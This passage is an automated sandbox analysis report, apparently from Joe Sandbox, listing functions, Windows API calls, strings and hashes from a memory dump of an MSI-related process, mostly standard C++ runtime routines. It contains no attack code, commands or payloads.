String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: b5e9e286b3233df57bc3bc4712f9947e14449cb226488d31789b53c516325fc8
Instruction ID: bf08be2341659c3f7fa46b0f1dc56b7f9f743e2c2b6c0b56bdea7ecbd8459ed4
Opcode Fuzzy Hash: b5e9e286b3233df57bc3bc4712f9947e14449cb226488d31789b53c516325fc8
Instruction Fuzzy Hash: 0DB1B07150020AEFDF29DF6CC95ADFE3BA9FB08300F140119FA46A62D1D6799AD1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0070BF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070BF85

Part of subcall function 006F8610: std::_Lockit::_Lockit.LIBCPMT ref: 006F8657
Part of subcall function 006F8610: std::_Lockit::_Lockit.LIBCPMT ref: 006F8679
Part of subcall function 006F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 006F86A1
Part of subcall function 006F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 006F880E

Strings

:AM:am:PM:pm, xrefs: 0070C2EB
%H : %M, xrefs: 0070C0C4
%m / %d / %y, xrefs: 0070C07C
%b %d %H : %M : %S %Y, xrefs: 0070C213
%d / %m / %y, xrefs: 0070C2BB
%I : %M : %S %p, xrefs: 0070C2E0
%H : %M : %S, xrefs: 0070C11E

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: 7abcb0273b9cc0781139da1de166062b7da3128c0956984459c986734b4fbf2c
Instruction ID: f3eebd493b0a6796182ded9a2b04688a2498c030f40a2069f9549e673d513fdc
Opcode Fuzzy Hash: 7abcb0273b9cc0781139da1de166062b7da3128c0956984459c986734b4fbf2c
Instruction Fuzzy Hash: B7B171B150010AEFDF1ADFA8CD56DBE7BE9FB04344F144319FA02A62D2D6398A10DB51

Uniqueness

Uniqueness Score: -1.00%

Function 006F3C20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006F36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 006F3735
Part of subcall function 006F36D0: _wcschr.LIBVCRUNTIME ref: 006F37C6

GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 006F3CA8
ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 006F3D01
ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 006F3D7A
ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 006F3EB1
GetLastError.KERNEL32 ref: 006F3F34
FreeLibrary.KERNEL32(?), ref: 006F3F7B

Strings

NtQueryInformationProcess, xrefs: 006F3CA2
1t, xrefs: 006F3F6C

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
String ID: NtQueryInformationProcess$1t
API String ID: 566592816-701000944
Opcode ID: 488c152577d904b6c5b8023bad3ad508491c50f6e1cb993f6e39626a4bd20c69
Instruction ID: fa38a5baba316dd5282c667220f9eb3aee81b457c74e5cd4d4130e64ab8b7aaf
Opcode Fuzzy Hash: 488c152577d904b6c5b8023bad3ad508491c50f6e1cb993f6e39626a4bd20c69
Instruction Fuzzy Hash: 5EA17AB0905659DEEB20CF64CC49BEEBBF1EF48304F20459DD509A7280E7B96A84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00713F20 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00713F57
___except_validate_context_record.LIBVCRUNTIME ref: 00713F5F
_ValidateLocalCookies.LIBCMT ref: 00713FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00714013
_ValidateLocalCookies.LIBCMT ref: 00714068

Strings

csm, xrefs: 00713FFD
2q, xrefs: 0071402C
TGq, xrefs: 00714005, 0071400E, 0071401F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: 2q$TGq$csm
API String ID: 1170836740-829041765
Opcode ID: 05dc24925575fbd82dc2f3daefa998f56bdce7c4e0bfde694b33fe127c129cae
Instruction ID: 3487387af9b7659c0cdd57e59c1c7308a69d54a7006e6e95b9c4c930d217ac2d
Opcode Fuzzy Hash: 05dc24925575fbd82dc2f3daefa998f56bdce7c4e0bfde694b33fe127c129cae
Instruction Fuzzy Hash: DE417274E00209DBCF10DF6CC885ADEBBB9AF44314F148155E9146B2D2D739AA86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00708555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0070855C
_Maklocstr.LIBCPMT ref: 007085C5
_Maklocstr.LIBCPMT ref: 007085D7
_Maklocchr.LIBCPMT ref: 007085EF
_Maklocchr.LIBCPMT ref: 007085FF
_Getvals.LIBCPMT ref: 00708621

Part of subcall function 00701CD4: _Maklocchr.LIBCPMT ref: 00701D03
Part of subcall function 00701CD4: _Maklocchr.LIBCPMT ref: 00701D19

Strings

false, xrefs: 007085C0
true, xrefs: 007085D2

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: e4aece894781dd8afa87841348db696e5f68a61df6e0c832b50c7ffc61e38049
Instruction ID: acd3826469645c13b06a3c4a0b02e4c45a9d2783ba2e11bc41c1b80815833925
Opcode Fuzzy Hash: e4aece894781dd8afa87841348db696e5f68a61df6e0c832b50c7ffc61e38049
Instruction Fuzzy Hash: 862153B1D00318EBDF14EFA4D889ADF7BB8BF05710F408116B9149F182DB789540CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006F9730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 006F9763

Part of subcall function 00700C94: __EH_prolog3.LIBCMT ref: 00700C9B
Part of subcall function 00700C94: std::_Lockit::_Lockit.LIBCPMT ref: 00700CA6
Part of subcall function 00700C94: std::locale::_Setgloballocale.LIBCPMT ref: 00700CC1
Part of subcall function 00700C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00700D17

std::_Lockit::_Lockit.LIBCPMT ref: 006F978A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006F97F0
std::locale::_Locimp::_Makeloc.LIBCPMT ref: 006F984A

Part of subcall function 006FF57A: __EH_prolog3.LIBCMT ref: 006FF581
Part of subcall function 006FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 006FF5C8
Part of subcall function 006FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 006FF620
Part of subcall function 006FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 006FF654
Part of subcall function 006FF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 006FF6A8

LocalFree.KERNEL32(00000000,00000000,?,007454B1,00000000), ref: 006F99BF
__cftoe.LIBCMT ref: 006F9B0B

Strings

bad locale name, xrefs: 006F98FF

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
String ID: bad locale name
API String ID: 3103716676-1405518554
Opcode ID: 573fa49ee9b095ff0c8e373ec6b41a2659d8e8b7331273b581459d5441af2bcf
Instruction ID: 8f5d893e0ec181644f87811c0e34a7042ef20067414f9ea6c6edb73000355e73
Opcode Fuzzy Hash: 573fa49ee9b095ff0c8e373ec6b41a2659d8e8b7331273b581459d5441af2bcf
Instruction Fuzzy Hash: 97F1AB71D01249DFDB14CFA8C885BEEBBB6EF09304F244169E915AB381E7359A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007272FB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00727632,00000021,FlsSetValue,0073BD58,0073BD60,?,?,00725955,00000006,000000FF,?,00716CE7,00000000,A8r), ref: 007273BC

Strings

ext-ms-, xrefs: 00727366
A8r, xrefs: 007272FD
api-ms-, xrefs: 00727352

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: FreeLibrary
String ID: A8r$api-ms-$ext-ms-
API String ID: 3664257935-2684993110
Opcode ID: adb08a736a617da291b3fda70dd21092d2f0df900cb5ca7853054b1f5b0a69e4
Instruction ID: 2cd58adb003a4c26011e42b10e557434cb3eb4062d7cf50ed6e262688a98b96a
Opcode Fuzzy Hash: adb08a736a617da291b3fda70dd21092d2f0df900cb5ca7853054b1f5b0a69e4
Instruction Fuzzy Hash: 09212776A092A1EBD729DB64BD41A5A3768EF42770F244110FD01A72C2D73CED00D6D0

Uniqueness

Uniqueness Score: -1.00%

Function 006F40B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,40000022,DBD9785B,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 006F4154
LocalAlloc.KERNEL32(00000040,3FFFFFFF,DBD9785B,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 006F4177
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 006F4217
OpenProcess.KERNEL32(00000400,00000000,?,DBD9785B,?,?,?), ref: 006F42D2
OpenProcess.KERNEL32(00000400,00000000,?,?,DBD9785B,?,?,?), ref: 006F42F3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,DBD9785B,?,?,?), ref: 006F4326
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,DBD9785B,?,?,?), ref: 006F4337
CloseHandle.KERNEL32(00000000,?,DBD9785B,?,?,?), ref: 006F4355
CloseHandle.KERNEL32(00000000,?,DBD9785B,?,?,?), ref: 006F4371

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Process$Local$AllocCloseHandleOpenTimes$Free
String ID:
API String ID: 1424318461-0
Opcode ID: 732e3db48722189dcd57b9d25fbbb0e053dfadd63ad28933bed85bde551330ff
Instruction ID: 9e94f9693afb100e098fd9a34ce6d7f8b9dd6effabeaa27e8fb9dae3e6737f35
Opcode Fuzzy Hash: 732e3db48722189dcd57b9d25fbbb0e053dfadd63ad28933bed85bde551330ff
Instruction Fuzzy Hash: A281A471A00209DFDB14CFA8D985BBEBBB5FB48310F144229E625E77D0DB74A941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0071266D Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 007126F8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00712786
__alloca_probe_16.LIBCMT ref: 007127B0
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007127F8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00712812
__alloca_probe_16.LIBCMT ref: 00712838
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00712875
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00712892

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
String ID:
API String ID: 3603178046-0
Opcode ID: 41c398320ff97dfeead0b300c4f6fb37762413903f964d1ab4c35cd7767a7ef6
Instruction ID: d2161a23220e2e81d7eefe4205bc26ab95392fa5a75155689e08d756fe4f250e
Opcode Fuzzy Hash: 41c398320ff97dfeead0b300c4f6fb37762413903f964d1ab4c35cd7767a7ef6
Instruction Fuzzy Hash: B471917590020AAFDF219F6CCC45AEF7BB6EF45750F244019E904A61E2E739C9A2CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0071215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 007121A3
__alloca_probe_16.LIBCMT ref: 007121CF
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0071220E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0071222B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0071226A
__alloca_probe_16.LIBCMT ref: 00712287
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007122C9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 007122EC

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 0231eedea7e8b577591fc0c96beff526f364b6054f499013cc02e4bce3ed516a
Instruction ID: b5fe8eba95e55de07252c94aad2b63a5d6e8daa9e62b4cda169079e7592f368b
Opcode Fuzzy Hash: 0231eedea7e8b577591fc0c96beff526f364b6054f499013cc02e4bce3ed516a
Instruction Fuzzy Hash: B551AD7260021ABBEB209F68CC45FEE7BA9FF44740F114129FA15A6191D73C9DA2DB60

Uniqueness

Uniqueness Score: -1.00%

Function 006F8610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006F8657
std::_Lockit::_Lockit.LIBCPMT ref: 006F8679
std::_Lockit::~_Lockit.LIBCPMT ref: 006F86A1
LocalAlloc.KERNEL32(00000040,00000044,00000000,DBD9785B,?,00000000), ref: 006F86F9
__Getctype.LIBCPMT ref: 006F877B
std::_Facet_Register.LIBCPMT ref: 006F87E4
std::_Lockit::~_Lockit.LIBCPMT ref: 006F880E

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
String ID:
API String ID: 2372200979-0
Opcode ID: d262b0d96a2d9fb9fa591af87d9e1f20fa71b311e62d49352654e0a4f80e00bb
Instruction ID: e312529f9830371746e7ebc285b1bf6a29dfb1f23087a1235c1d1cab31b261ea
Opcode Fuzzy Hash: d262b0d96a2d9fb9fa591af87d9e1f20fa71b311e62d49352654e0a4f80e00bb
Instruction Fuzzy Hash: 1261B0B1D00648CFDB21DF68C944BAAB7F0FB14714F148299D945AB392EB38AE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006F9270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006F92A0
std::_Lockit::_Lockit.LIBCPMT ref: 006F92C2
std::_Lockit::~_Lockit.LIBCPMT ref: 006F92EA
LocalAlloc.KERNEL32(00000040,00000018,00000000,DBD9785B,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 006F9342
__Getctype.LIBCPMT ref: 006F93BD
std::_Facet_Register.LIBCPMT ref: 006F93F8
std::_Lockit::~_Lockit.LIBCPMT ref: 006F9422

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
String ID:
API String ID: 2372200979-0
Opcode ID: fc6c766759ee2b5ef251b0a90f084b327b1c41fea39f28cb1d11a6ba60501ea0
Instruction ID: bf531aae3a11cbd250f434e3871589744c0689c43e91c6a76dfb065a8f273062
Opcode Fuzzy Hash: fc6c766759ee2b5ef251b0a90f084b327b1c41fea39f28cb1d11a6ba60501ea0
Instruction Fuzzy Hash: 2051FF71D04208DFDB21CF68C844BAEBBF1EF11714F14825AE941AB382D778AE41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006F6FB0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 77COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 006F6FB7

Strings

<St, xrefs: 006F7031
Call to ShellExecute() for verb<, xrefs: 006F6FC1
Last error=, xrefs: 006F7011
<St, xrefs: 006F6FF0
> returned:, xrefs: 006F6FC6
<St, xrefs: 006F706C

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLast
String ID: <St$<St$<St$> returned:$Call to ShellExecute() for verb<$Last error=
API String ID: 1452528299-2772639816
Opcode ID: 116c5a8e6548e411450b5f87d19f172a1bbf0eeed57a8d87d2f8e179ae3d445c
Instruction ID: 95e2cdb4b84674a582f0eb3b34be3d37190b387278cc8969b6118b81b1538e9a
Opcode Fuzzy Hash: 116c5a8e6548e411450b5f87d19f172a1bbf0eeed57a8d87d2f8e179ae3d445c
Instruction Fuzzy Hash: DA219F89A1022583CB741F28D401379A2E2EF54B58F64187FE9C8D7381EBA98C82C395

Uniqueness

Uniqueness Score: -1.00%

Function 006FD87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 006FD883
std::_Lockit::_Lockit.LIBCPMT ref: 006FD88D

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

numpunct.LIBCPMT ref: 006FD8C7
std::_Facet_Register.LIBCPMT ref: 006FD8DE
std::_Lockit::~_Lockit.LIBCPMT ref: 006FD8FE

Strings

2q, xrefs: 006FD8EB

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID: 2q
API String ID: 743221004-950290719
Opcode ID: 9bb24f7a8b917d00c163bab9f434347839b3e9d4b555b4e542420e2ecadead92
Instruction ID: 56949c120ba0b93eea2eb47e1ac03c7fd4993ac81889d60840c26afd4bb8bd86
Opcode Fuzzy Hash: 9bb24f7a8b917d00c163bab9f434347839b3e9d4b555b4e542420e2ecadead92
Instruction Fuzzy Hash: 8311AC35900219DBCF15AB64D805ABE77B2BF84310F24455AE5116B3D1CF78AE018B90

Uniqueness

Uniqueness Score: -1.00%

Function 007022FA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702301
std::_Lockit::_Lockit.LIBCPMT ref: 0070230B

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

codecvt.LIBCPMT ref: 00702345
std::_Facet_Register.LIBCPMT ref: 0070235C
std::_Lockit::~_Lockit.LIBCPMT ref: 0070237C

Strings

2q, xrefs: 00702369

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: 2q
API String ID: 712880209-950290719
Opcode ID: 42c1a2a2543cb621010664c9a98518516c0a9ad7d51ebd55f61f294e52c06996
Instruction ID: 40cba3ca5dc04edb1ee0ae71050570d2158f9ba1892c13c6c514bed041a05c98
Opcode Fuzzy Hash: 42c1a2a2543cb621010664c9a98518516c0a9ad7d51ebd55f61f294e52c06996
Instruction Fuzzy Hash: 0601A176900119DFCB15EB64D809ABEB7B1BF44720F244609F500AB2D2CF3C9E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0070238F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702396
std::_Lockit::_Lockit.LIBCPMT ref: 007023A0

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

codecvt.LIBCPMT ref: 007023DA
std::_Facet_Register.LIBCPMT ref: 007023F1
std::_Lockit::~_Lockit.LIBCPMT ref: 00702411

Strings

2q, xrefs: 007023FE

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
